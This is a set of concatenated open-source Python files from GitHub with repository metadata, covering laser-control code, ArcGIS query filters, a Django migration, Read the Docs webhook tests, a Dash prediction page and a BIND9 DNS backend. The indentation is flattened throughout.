cmd = "TracePath {},{},{}".format(value, name, kind)
self.info("sending {}".format(cmd))
self._ask(cmd)
return self._block(cmd="IsTracing")
def drill_point(self, value, name):
cmd = "DrillPoint"
# ===============================================================================
#
# ===============================================================================
def _fire_fired(self):
if self.fire_mode == "Continuous":
mode = "continuous"
else:
mode = "burst"
self.firing = True
self._ask("Fire {}".format(mode))
def _stop_fired(self):
self.firing = False
self._ask("Fire stop")
@on_trait_change("mask, attenuator, zoom")
def _motor_changed(self, name, new):
if new is not None:
t = Thread(target=self.set_motor, args=(name, new))
t.start()
# ===============================================================================
#
# ===============================================================================
def _opened_hook(self):
nb = self._ask("GetNBurst")
self._nburst = self._get_int(nb)
mb = self._ask("GetBurstMode")
if mb is not None:
self.fire_mode = "Burst" if mb == "1" else "Continuous"
self._mask = 0
def _move_to_position(self, pos, autocenter, block):
cmd = "GoToPoint"
# if pos.startswith('t'):
# if not TRANSECT_REGEX[0].match(pos):
# cmd = None
if isinstance(pos, (str, six.text_type)):
if not pos:
return
if pos[0].lower() in ["t", "l", "d"]:
cmd = "GoToNamedPosition"
if cmd:
cmd = "{},{}".format(cmd, pos)
self.info("sending {}".format(cmd))
self._ask(cmd)
time.sleep(0.5)
r = self._block()
self.update_position()
return r
# ===============================================================================
# property get/set
# ===============================================================================
def _get_int(self, resp):
r = 0
if resp is not None:
try:
r = int(resp)
except (ValueError, TypeError):
pass
return r
def _validate_nburst(self, v):
try:
return int(v)
except (ValueError, TypeError):
pass
def _set_nburst(self, v):
if v is not None:
v = int(v)
self._ask("SetNBurst {}".format(v))
self._nburst = v
def _get_nburst(self):
return self._nburst
def _set_mask(self, m):
self._mask = m
def _get_mask(self):
return self._mask
def _validate_mask(self, m):
if m in self.masks:
return m
else:
try:
return float(m)
except ValueError:
pass
@cached_property
def _get_masks(self):
return self._get_motor_values("mask_names")
def _get_motor_values(self, name):
p = os.path.join(paths.device_dir, "fusions_uv", "{}.txt".format(name))
values = []
if os.path.isfile(p):
with open(p, "r") as rfile:
for lin in rfile:
lin = lin.strip()
if not lin or lin.startswith("#"):
continue
values.append(lin)
return values
def _controls_client_default(self):
from pychron.lasers.laser_managers.client import UVLaserControlsClient
return UVLaserControlsClient(model=self)
def _optics_client_default(self):
from pychron.lasers.laser_managers.client import UVLaserOpticsClient
return UVLaserOpticsClient(model=self)
# ============= EOF =============================================
|
{
"content_hash": "f8fe019f0f880af89074fe33b1b6885c",
"timestamp": "",
"source": "github",
"line_count": 637,
"max_line_length": 88,
"avg_line_length": 30.040816326530614,
"alnum_prop": 0.5159908026755853,
"repo_name": "NMGRL/pychron",
"id": "8d5b821064dd9f9b00200992abab5b228b419ac9",
"size": "19938",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/lasers/laser_managers/pychron_laser_manager.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
}
|
import os
import json
import time
import calendar
import datetime
from ..common.geometry import Polygon, Polyline, Point, MultiPoint
from .._abstract.abstract import AbstractGeometry, BaseFilter
import arcpy
########################################################################
class LayerDefinitionFilter(BaseFilter):
"""
Allows you to filter the features of individual layers in the
query by specifying definition expressions for those layers. A
definition expression for a layer that is published with the
service will always be honored.
"""
_ids = []
_filterTemplate = {"layerId" : "", "where" : "", "outFields" : "*"}
_filter = []
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
pass
#----------------------------------------------------------------------
def addFilter(self, layer_id, where=None, outFields="*"):
""" adds a layer definition filter """
import copy
f = copy.deepcopy(self._filterTemplate)
f['layerId'] = layer_id
f['outFields'] = outFields
if where is not None:
f['where'] = where
if f not in self._filter:
self._filter.append(f)
#----------------------------------------------------------------------
def removeFilter(self, filter_index):
""" removes a layer filter based on position in filter list """
f = self._filter[filter_index]
self._filter.remove(f)
#----------------------------------------------------------------------
def removeAll(self):
""" removes all items from the filter """
self._filter = []
#----------------------------------------------------------------------
@property
def filter(self):
""" returns the filter object as a list of layer defs """
return self._filter
########################################################################
class GeometryFilter(BaseFilter):
""" creates a geometry filter for queries
Inputs:
geomObject - a common.Geometry or arcpy.Geometry object
spatialFilter - The spatial relationship to be applied on the
input geometry while performing the query. The
supported spatial relationships include
intersects, contains, envelope intersects,
within, etc. The default spatial relationship
is intersects (esriSpatialRelIntersects).
Raises:
AttributeError for invalid inputs
"""
_allowedFilters = ["esriSpatialRelIntersects",
"esriSpatialRelContains",
"esriSpatialRelCrosses",
"esriSpatialRelEnvelopeIntersects",
"esriSpatialRelIndexIntersects",
"esriSpatialRelOverlaps",
"esriSpatialRelTouches",
"esriSpatialRelWithin"]
_geomObject = None
_spatialAction = None
_geomType = None
_spatialReference = None
#----------------------------------------------------------------------
def __init__(self, geomObject, spatialFilter="esriSpatialRelIntersects"):
"""Constructor"""
self.geometry = geomObject
if spatialFilter in self._allowedFilters:
self._spatialAction = spatialFilter
self._spatialReference = self.geometry.spatialReference
else:
raise AttributeError("geomObject must be a geometry object and "+ \
"spatialFilter must be of value: " + \
"%s" % ", ".join(self._allowedFilters))
#----------------------------------------------------------------------
@property
def spatialRelation(self):
""" gets the filter type """
return self._spatialAction
#----------------------------------------------------------------------
@spatialRelation.setter
def spatialRelation(self, value):
if value.lower() in \
[x.lower() for x in self._allowedFilters]:
self._spatialAction = value
else:
raise AttributeError("spatialRelation must be values of " + \
"%s" % ", ".join(self._allowedFilters))
#----------------------------------------------------------------------
@property
def geometryType(self):
""" returns the geometry type """
return self._geomObject.type
#----------------------------------------------------------------------
@property
def geometry(self):
""" gets the geometry object used by the filter """
return self._geomObject
#----------------------------------------------------------------------
@geometry.setter
def geometry(self, geometry):
""" sets the geometry value """
if isinstance(geometry, AbstractGeometry):
self._geomObject = geometry
self._geomType = geometry.type
elif isinstance(geometry, arcpy.Polygon):
self._geomObject = Polygon(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPolygon"
elif isinstance(geometry, arcpy.Point):
self._geomObject = Point(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPoint"
elif isinstance(geometry, arcpy.Polyline):
self._geomObject = Polyline(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryPolyline"
elif isinstance(geometry, arcpy.Multipoint):
self._geomObject = MultiPoint(geometry, wkid=geometry.spatialReference.factoryCode)
self._geomType = "esriGeometryMultipoint"
else:
raise AttributeError("geometry must be a common.Geometry or arcpy.Geometry type.")
#----------------------------------------------------------------------
@property
def filter(self):
""" returns the key/value pair of a geometry filter """
return {"geometryType":self.geometryType,
"geometry": json.dumps(self._geomObject.asDictionary),
"spatialRel": self.spatialRelation,
"inSR" : self._geomObject.spatialReference['wkid']}
#----------------------------------------------------------------------
########################################################################
class TimeFilter(BaseFilter):
""" Implements the time filter """
_startTime = None
_endTime = None
#----------------------------------------------------------------------
def __init__(self, start_time, time_zone="UTC", end_time=None):
"""Constructor"""
self._startTime = start_time
self._endTime = end_time
self._tz = time_zone
#----------------------------------------------------------------------
@property
def filter(self):
if not self._endTime is None:
val = "%s, %s" % (self._startTime, self._endTime)
return val
else:
return "%s" % self._startTime
|
{
"content_hash": "afa8b5c187d9f47815654921e9bbaf7b",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 95,
"avg_line_length": 45.19375,
"alnum_prop": 0.48679297469229704,
"repo_name": "achapkowski/ArcREST",
"id": "9e048cc008117817308f8fbea5e38d342b06c34b",
"size": "7231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/arcrest/common/filters.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1234325"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('velkoja', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='notificationsent',
name='notification_no',
field=models.PositiveIntegerField(default=1),
),
]
|
{
"content_hash": "56d81d0fa5cfdfe819dbb46dae833312",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 57,
"avg_line_length": 21.72222222222222,
"alnum_prop": 0.6086956521739131,
"repo_name": "rambo/asylum",
"id": "3ab22e8703c10adec75b71b31c9357607a5e367a",
"size": "415",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "project/velkoja/migrations/0002_notificationsent_notification_no.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "31215"
},
{
"name": "Dockerfile",
"bytes": "3192"
},
{
"name": "HTML",
"bytes": "9566"
},
{
"name": "JavaScript",
"bytes": "2309"
},
{
"name": "Python",
"bytes": "194588"
},
{
"name": "Shell",
"bytes": "5532"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
import json
import logging
from readthedocs.projects.models import Project
from readthedocs.projects import tasks
log = logging.getLogger(__name__)
class GitLabWebHookTest(TestCase):
fixtures = ["eric", "test_data"]
def tearDown(self):
tasks.update_docs = self.old_bd
def setUp(self):
self.old_bd = tasks.update_docs
def mock(*args, **kwargs):
log.info("Mocking for great profit and speed.")
tasks.update_docs = mock
tasks.update_docs.apply_async = mock
self.client.login(username='eric', password='test')
self.payload = {
"object_kind": "push",
"before": "95790bf891e76fee5e1747ab589903a6a1f80f22",
"after": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
"ref": "refs/heads/awesome",
"user_id": 4,
"user_name": "John Smith",
"user_email": "john@example.com",
"project_id": 15,
"repository": {
"name": "Diaspora",
"url": "git@github.com:rtfd/readthedocs.org.git",
"description": "",
"homepage": "http://github.com/rtfd/readthedocs.org",
"git_http_url": "http://github.com/rtfd/readthedocs.org.git",
"git_ssh_url": "git@github.com:rtfd/readthedocs.org.git",
"visibility_level":0
},
"commits": [
{
"id": "b6568db1bc1dcd7f8b4d5a946b0b91f9dacd7327",
"message": "Update Catalan translation to e38cb41.",
"timestamp": "2011-12-12T14:27:31+02:00",
"url": "http://github.com/mike/diaspora/commit/b6568db1bc1dcd7f8b4d5a946b0b91f9dacd7327",
"author": {
"name": "Jordi Mallach",
"email": "jordi@softcatala.org"
}
},
{
"id": "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
"message": "fixed readme",
"timestamp": "2012-01-03T23:36:29+02:00",
"url": "http://github.com/mike/diaspora/commit/da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
"author": {
"name": "GitLab dev user",
"email": "gitlabdev@dv6700.(none)"
}
}
],
"total_commits_count": 4
}
def test_gitlab_post_commit_hook_builds_branch_docs_if_it_should(self):
"""
Test the github post commit hook to see if it will only build
versions that are set to be built if the branch they refer to
is updated. Otherwise it is no op.
"""
r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [awesome]')
self.payload['ref'] = 'refs/heads/not_ok'
r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org [not_ok]')
self.payload['ref'] = 'refs/heads/unknown'
r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org []')
def test_gitlab_post_commit_knows_default_branches(self):
"""
Test the gitlab post commit hook so that the default branch
will be respected and built as the latest version.
"""
rtd = Project.objects.get(slug='read-the-docs')
old_default = rtd.default_branch
rtd.default_branch = 'master'
rtd.save()
self.payload['ref'] = 'refs/heads/master'
r = self.client.post('/gitlab/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [latest]')
rtd.default_branch = old_default
rtd.save()
class PostCommitTest(TestCase):
fixtures = ["eric", "test_data"]
def setUp(self):
def mock(*args, **kwargs):
pass
tasks.UpdateDocsTask.run = mock
tasks.UpdateDocsTask.apply_async = mock
self.client.login(username='eric', password='test')
self.payload = {
"after": "5ad757394b926e5637ffeafe340f952ef48bd270",
"base_ref": "refs/heads/master",
"before": "5b4e453dc913b08642b1d4fb10ed23c9d6e5b129",
"commits": [
{
"added": [],
"author": {
"email": "eric@ericholscher.com",
"name": "Eric Holscher",
"username": "ericholscher"
},
"distinct": False,
"id": "11f229c6a78f5bc8cb173104a3f7a68cdb7eb15a",
"message": "Fix it on the front list as well.",
"modified": [
"readthedocs/templates/core/project_list_detailed.html"
],
"removed": [],
"timestamp": "2011-09-12T19:38:55-07:00",
"url": ("https://github.com/wraithan/readthedocs.org/"
"commit/11f229c6a78f5bc8cb173104a3f7a68cdb7eb15a")
},
],
"compare": ("https://github.com/wraithan/readthedocs.org/compare/"
"5b4e453...5ad7573"),
"created": False,
"deleted": False,
"forced": False,
"pusher": {
"name": "none"
},
"ref": "refs/heads/awesome",
"repository": {
"created_at": "2011/09/09 14:20:13 -0700",
"description": "source code to readthedocs.org",
"fork": True,
"forks": 0,
"has_downloads": True,
"has_issues": False,
"has_wiki": True,
"homepage": "http://rtfd.org/",
"language": "Python",
"name": "readthedocs.org",
"open_issues": 0,
"owner": {
"email": "XWraithanX@gmail.com",
"name": "wraithan"
},
"private": False,
"pushed_at": "2011/09/12 22:33:34 -0700",
"size": 140,
"url": "https://github.com/rtfd/readthedocs.org",
"watchers": 1
}
}
def test_github_post_commit_hook_builds_branch_docs_if_it_should(self):
"""
Test the github post commit hook to see if it will only build
versions that are set to be built if the branch they refer to
is updated. Otherwise it is no op.
"""
r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [awesome]')
self.payload['ref'] = 'refs/heads/not_ok'
r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org [not_ok]')
self.payload['ref'] = 'refs/heads/unknown'
r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Not Building: github.com/rtfd/readthedocs.org []')
def test_github_post_commit_knows_default_branches(self):
"""
Test the github post commit hook so that the default branch
will be respected and built as the latest version.
"""
rtd = Project.objects.get(slug='read-the-docs')
old_default = rtd.default_branch
rtd.default_branch = 'master'
rtd.save()
self.payload['ref'] = 'refs/heads/master'
r = self.client.post('/github/', {'payload': json.dumps(self.payload)})
self.assertEqual(r.status_code, 200)
self.assertEqual(r.content, '(URL Build) Build Started: github.com/rtfd/readthedocs.org [latest]')
rtd.default_branch = old_default
rtd.save()
def test_core_commit_hook(self):
rtd = Project.objects.get(slug='read-the-docs')
rtd.default_branch = 'master'
rtd.save()
r = self.client.post('/build/%s' % rtd.pk, {'version_slug': 'master'})
self.assertEqual(r.status_code, 302)
self.assertEqual(r._headers['location'][1], 'http://testserver/projects/read-the-docs/builds/')
|
{
"content_hash": "f5ed3ee5ee689fc7f9de99527b7cf1eb",
"timestamp": "",
"source": "github",
"line_count": 216,
"max_line_length": 109,
"avg_line_length": 41.851851851851855,
"alnum_prop": 0.5388274336283185,
"repo_name": "stevepiercy/readthedocs.org",
"id": "0579ec337ad30affa92988a9080070511eacc48a",
"size": "9040",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "readthedocs/rtd_tests/tests/test_post_commit_hooks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4515"
},
{
"name": "CSS",
"bytes": "56305"
},
{
"name": "HTML",
"bytes": "198012"
},
{
"name": "JavaScript",
"bytes": "440641"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "959642"
},
{
"name": "Shell",
"bytes": "367"
}
],
"symlink_target": ""
}
|
import json
import base64
import datetime
import io
import os
import glob
import pandas as pd
import numpy as np
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from app import app, indicator
from core import define
from core import prepare
from core import fselect
from core import evaluate
current_path = os.getcwd()
MARKET_PATH = os.path.join(current_path, 'market')
# @functools.lru_cache(maxsize=32)
def parse_contents(contents, filename, date):
content_type, content_string = contents.split(',')
decoded = base64.b64decode(content_string)
try:
if 'csv' in filename:
# Assume that the user uploaded a CSV file
df = pd.read_csv(
io.StringIO(decoded.decode('utf-8')))
elif 'xls' in filename:
# Assume that the user uploaded an excel file
df = pd.read_excel(io.BytesIO(decoded))
except Exception as e:
print(e)
return html.Div([
'There was an error processing this file.'
])
return df, filename, datetime.datetime.fromtimestamp(date)
def list_files_market():
files_path = glob.glob(os.path.join(MARKET_PATH, '*', '*.csv'))
# folders = [folder for folder in os.listdir(MARKET_PATH)]
files = [os.path.basename(file) for file in files_path]
files_dict = [
{"label": file, "value": file} for file in files
]
return files_dict
def list_models(problem_type='classification'):
# models = ['GradientBoostingClassifier', 'ExtraTreesClassifier',
# 'RandomForestClassifier', 'DecisionTreeClassifier',
# 'LinearDiscriminantAnalysis', 'SVC', 'KNeighborsClassifier',
# 'LogisticRegression', 'AdaBoostClassifier', 'VotingClassifier',
# 'GaussianNB', 'MLPClassifier']
models = []
if problem_type == 'classification':
models = ['AdaBoostClassifier', 'GradientBoostingClassifier',
'BaggingClassifier', 'RandomForestClassifier',
'KNeighborsClassifier', 'DecisionTreeClassifier',
'MLPClassifier', 'ExtraTreesClassifier', 'SVC',
'LinearDiscriminantAnalysis', 'GaussianNB',
'LogisticRegression', 'VotingClassifier',
'XGBoostClassifier', 'LGBMClassifier']
elif problem_type == 'regression':
models = ['AdaBoostRegressor', 'GradientBoostingRegressor',
'BaggingRegressor', 'RandomForestRegressor',
'KNeighborsRegressor', 'DecisionTreeRegressor',
'MLPRegressor', 'ExtraTreesRegressor', 'SVR',
'LinearRegression', 'BayesianRidge',
'XGBoostRegressor', 'LGBMRegressor']
# files_dict = [
# {"label": m, "value": m} for m in models
# ]
return models
def list_prepare():
preparers = ['MinMaxScaler', 'Normalizer',
'StandardScaler', 'RobustScaler']
files_dict = [
{"label": m, "value": m} for m in preparers
]
return files_dict
def list_select():
selectors = ['SelectKBest', 'PrincipalComponentAnalysis',
'ExtraTrees', ]
files_dict = [
{"label": m, "value": m} for m in selectors
]
return files_dict
layout = [
html.Div([
########################### Indicators I ##################################
html.Div(
[
indicator(
"#119DFF", "Type of Problem", "problem_type_predict_indicator"
),
indicator(
"#119DFF", "Filename", "filename_predict_indicator"
),
html.Div(
[
html.P(
'Uploaded files',
className="twelve columns indicator_text"
),
dcc.Dropdown(
id="files_uploaded_predict_dropdown",
options=list_files_market(),
value="",
clearable=False,
searchable=False,
className='indicator_value'
),
],
className="four columns indicator",
),
# indicatorii(
# "#EF553B",
# "Size",
# "right_leads_indicator",
# ),
],
className="row",
),
# dash_table.DataTable(id='datatable-upload-container'),
# dcc.Graph(id='datatable-upload-graph')
],
className="row",
style={"marginBottom": "10"},
),
########################### Indicators II ##################################
html.Div(
[
indicator(
"#00cc96", "Number of samples", "n_samples_predict_indicator"
),
indicator(
"#119DFF", "Number of features", "n_features_predict_indicator"
),
indicator(
"#EF553B",
"Size in memory",
"size_predict_indicator",
),
],
className="row",
style={"marginBottom": "10"},
),
html.Hr(),
########################### Table results ##################################
html.Div(
[
html.Div(
[
html.P(
'Sample dataset',
className="twelve columns indicator_text"
),
# html.Div(id='output-data-upload'),
dash_table.DataTable(
id='sample_predict_table',
# data=dff.to_dict('rows'),
# columns=[
# {'name': i, 'id': i, 'deletable': True} for i in sorted(dff.columns)
# ],
style_header={
# 'backgroundColor': 'white',
'backgroundColor': '#248f24',
'color': 'white',
'fontWeight': 'bold'
},
style_cell_conditional=[{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}],
row_selectable="multi",
row_deletable=True,
# selected_rows=[0],
# pagination_settings={
# 'current_page': 0,
# 'page_size': 10
# },
# pagination_mode='be',
# sorting='be',
# sorting_type='single',
# sorting_settings=[]
)
],
className="six columns",
),
html.Div(
[
# html.P("Agrupacion por cantidad de CPE"),
html.P(
'Fill values to predict',
className="twelve columns indicator_text"
),
dash_table.DataTable(
id='fill_predict_table',
# data=dff.to_dict('rows'),
# columns=[
# {'name': i, 'id': i, 'deletable': True} for i in sorted(dff.columns)
# ],
style_header={
# 'backgroundColor': 'white',
'backgroundColor': '#148f24',
'color': 'white',
'fontWeight': 'bold'
},
style_cell_conditional=[{
'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
}],
row_selectable="multi",
row_deletable=True,
# selected_rows=[0],
editable=True,
# pagination_settings={
# 'current_page': 0,
# 'page_size': 10
# },
# pagination_mode='be',
# sorting='be',
# sorting_type='single',
# sorting_settings=[]
)
],
className="six columns",
),
# html.Div(id='metrics_predict_graph',
# className="four columns",
# ),
# html.Div(id='fi_predict_graph',
# className="four columns"),
],
className="row",
style={"marginBottom": "10", "marginTop": "10"},
),
########################### Button ##################################
html.Div(id='hidden_predict_div', style={'display': 'none'}),
# html.Div(id='hidden_model_div'),
html.Div(
[
html.Div(
[
# submit button
html.Span(
"Predict values",
id="run_predict_button",
n_clicks=0,
# className="btn btn-primary"
className="button button--primary add"
),
# dcc.Input(
# id="output_chatbot",
# placeholder="Respuesta de Adaline: ",
# type="text",
# value="",
# disabled=True,
# style={"width": "100%"},
# ),
],
# className="six columns",
className="two columns",
# style={"paddingRight": "15"},
),
html.Div(
id='save_file_predict_div',
className="two columns",
# style={"paddingRight": "15"},
),
],
className="row",
style={"marginBottom": "10", "marginTop": "10"},
),
]
@app.callback(
[Output('filename_predict_indicator', 'children'),
Output('n_samples_predict_indicator', 'children'),
Output('n_features_predict_indicator', 'children'),
Output('size_predict_indicator', 'children'),
Output('cat_features_predict_dropdown', 'options'),
Output('cat_features_predict_dropdown', 'value'),
Output('num_features_predict_dropdown', 'options'),
Output('num_features_predict_dropdown', 'value'),
Output('response_predict_dropdown', 'options'),
Output('response_predict_dropdown', 'value'),
Output('problem_type_predict_indicator', 'children'),
Output('models_predict_dropdown', 'options'),
Output('models_predict_dropdown', 'value')],
[Input('files_uploaded_predict_dropdown', 'value')])
def update_metadata_predict(uploaded_file):
if uploaded_file != '':
metadata_folder = os.path.join(MARKET_PATH, uploaded_file.replace('.csv', ''))
metadata_filename = uploaded_file.replace('.csv', '') + '_meta.json'
metadata_path = os.path.join(metadata_folder, metadata_filename)
with open(metadata_path, 'r') as f:
metadata = json.load(f)
filename = uploaded_file
n_samples = metadata['n_samples']
n_features = metadata['n_features']
num_features = metadata['num_features']
cat_features = metadata['cat_features']
response = metadata['response']
problem_type = metadata['problem_type']
size = metadata['size']
else:
filename = ''
n_samples = ''
n_features = ''
size = ''
cat_features = []
num_features = []
response = ''
problem_type = ''
num_options = [
{"label": file, "value": file} for file in num_features
]
cat_options = [
{"label": file, "value": file} for file in cat_features
]
response_options = [
{"label": file, "value": file} for file in [response]
]
models_options = [
{"label": file, "value": file} for file in list_models(problem_type)
]
models_value = np.random.choice(list_models(problem_type), 3, replace=False)
out = tuple([filename, n_samples, n_features, size,
cat_options, cat_features, num_options, num_features,
response_options, response, problem_type,
models_options, models_value])
return out
@app.callback([Output('sample_predict_table', 'data'),
Output('sample_predict_table', 'columns'),
Output('fill_predict_table', 'data'),
Output('fill_predict_table', 'columns')],
[Input('files_uploaded_predict_dropdown', 'value')])
def show_tables_predict(uploaded_file):
if uploaded_file != '':
print('tuning>>>>>', uploaded_file)
metadata_folder = os.path.join(MARKET_PATH, uploaded_file.replace('.csv', ''))
metadata_filename = uploaded_file.replace('.csv', '') + '_meta.json'
metadata_path = os.path.join(metadata_folder, metadata_filename)
with open(metadata_path, 'r') as f:
metadata = json.load(f)
filename_path = os.path.join(metadata_folder, uploaded_file)
df = pd.read_csv(filename_path)
df = df.sample(10)
# df_predict = df.loc[:, df.columns != metadata['response']]
df_predict = df.copy()
df_predict[metadata['response']] = np.zeros(len(df))
df_predict.rename(columns={metadata['response']: 'prediction'}, inplace=True)
columns_table=[
{'name': i, 'id': i, 'deletable': True} for i in df.columns
]
columns_table_predict=[
{'name': i, 'id': i, 'deletable': True} for i in df_predict.columns
]
# name = 'AdaBoostClassifier'
# return tuple([plot, df.to_dict('rows'), columns_table, evaluator.plot_metrics(name)])
return tuple([df.to_dict('rows'), columns_table,
df_predict.to_dict('rows'), columns_table_predict])
return tuple([None for _ in range(4)])
@app.callback(
Output('fill_predict_table2', "data"),
[Input('fill_predict_table', "derived_virtual_data"),
Input('fill_predict_table', "derived_virtual_selected_rows")],
[State('files_uploaded_predict_dropdown', 'value')])
def show_prediction_predict(rows, selected_rows, uploaded_file):
# print('selected>>>', selected_rows)
if selected_rows is None:
selected_rows = []
if len(selected_rows) > 0:
metadata_folder = os.path.join(MARKET_PATH, uploaded_file.replace('.csv', ''))
folder_path = os.path.join(metadata_folder, 'model')
path_metrics = os.path.join(folder_path, 'metrics.json')
path_fi = os.path.join(folder_path, 'feature_importance.json')
with open(path_metrics, 'r') as f:
metrics = json.load(f)
with open(path_fi, 'r') as f:
fi = json.load(f)
for k, v in fi.items():
fi[k] = pd.DataFrame(v)
list_figs_metrics = []
list_figs_fi = []
for index in selected_rows:
print(rows[index])
# model_name = rows[index]['Model']
# evaluator = evaluate.Evaluate()
# evaluator.problem_type = 'classification'
#
# # metrics
# evaluator.metrics = metrics
# fig_metrics = evaluator.plot_metrics(model_name)
# list_figs_metrics.append(fig_metrics)
#
# # feature importance
# evaluator.feature_importance = fi
# fig_fi = evaluator.plot_feature_importance(model_name)
# list_figs_fi.append(fig_fi)
# return_figs_metrics = [dcc.Graph(figure=f) for f in list_figs_metrics]
# return_figs_fi = [dcc.Graph(figure=f) for f in list_figs_fi]
# return html.Div(return_figs_metrics), html.Div(return_figs_fi)
|
{
"content_hash": "07fb96c1f424385e5bd2e3a6b9ca2110",
"timestamp": "",
"source": "github",
"line_count": 449,
"max_line_length": 98,
"avg_line_length": 36.97104677060133,
"alnum_prop": 0.47457831325301203,
"repo_name": "gusseppe/pymach",
"id": "988f51ccb1fbeb2fc4e452ac33958d8be29b433e",
"size": "16624",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymach/dashboard/apps/predict_front.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "28826"
},
{
"name": "Dockerfile",
"bytes": "119"
},
{
"name": "Makefile",
"bytes": "2291"
},
{
"name": "Python",
"bytes": "319018"
}
],
"symlink_target": ""
}
|
import random
from oslo_log import log as logging
from designate import exceptions
from designate import utils
from designate.backend import base
LOG = logging.getLogger(__name__)
DEFAULT_MASTER_PORT = 5354
class Bind9Backend(base.Backend):
__plugin_name__ = 'bind9'
def __init__(self, target):
super(Bind9Backend, self).__init__(target)
self.rndc_host = self.options.get('rndc_host', '127.0.0.1')
self.rndc_port = int(self.options.get('rndc_port', 953))
self.rndc_config_file = self.options.get('rndc_config_file')
self.rndc_key_file = self.options.get('rndc_key_file')
def create_domain(self, context, domain):
LOG.debug('Create Domain')
masters = []
for master in self.masters:
host = master['host']
port = master['port']
masters.append('%s port %s' % (host, port))
# Ensure different MiniDNS instances are targetted for AXFRs
random.shuffle(masters)
rndc_op = [
'addzone',
'%s { type slave; masters { %s;}; file "slave.%s%s"; };' %
(domain['name'].rstrip('.'), '; '.join(masters), domain['name'],
domain['id']),
]
try:
self._execute_rndc(rndc_op)
except exceptions.Backend as e:
# If create fails because the domain exists, don't reraise
if "already exists" not in str(e.message):
raise
def delete_domain(self, context, domain):
LOG.debug('Delete Domain')
rndc_op = [
'delzone',
'%s' % domain['name'].rstrip('.'),
]
try:
self._execute_rndc(rndc_op)
except exceptions.Backend as e:
# If domain is already deleted, don't reraise
if "not found" not in str(e.message):
raise
def _rndc_base(self):
rndc_call = [
'rndc',
'-s', self.rndc_host,
'-p', str(self.rndc_port),
]
if self.rndc_config_file:
rndc_call.extend(
['-c', self.rndc_config_file])
if self.rndc_key_file:
rndc_call.extend(
['-k', self.rndc_key_file])
return rndc_call
def _execute_rndc(self, rndc_op):
try:
rndc_call = self._rndc_base()
rndc_call.extend(rndc_op)
LOG.debug('Executing RNDC call: %s' % " ".join(rndc_call))
utils.execute(*rndc_call)
except utils.processutils.ProcessExecutionError as e:
LOG.debug('RNDC call failure: %s' % e)
raise exceptions.Backend(e)
|
{
"content_hash": "5dd6b32ec0dbfad07f50a79b63651051",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 76,
"avg_line_length": 29.8876404494382,
"alnum_prop": 0.5409774436090226,
"repo_name": "cneill/designate",
"id": "ea256180c9a69cdbc3ee3d15f33f8dcbf1e0335e",
"size": "3278",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "designate/backend/impl_bind9.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "7596"
},
{
"name": "JavaScript",
"bytes": "1378"
},
{
"name": "Python",
"bytes": "1866778"
},
{
"name": "Ruby",
"bytes": "4238"
},
{
"name": "Shell",
"bytes": "13350"
}
],
"symlink_target": ""
}
|
"""
"""
import os, sys, posixpath
import py
# Moved from local.py.
iswin32 = sys.platform == "win32" or (getattr(os, '_name', False) == 'nt')
class Checkers:
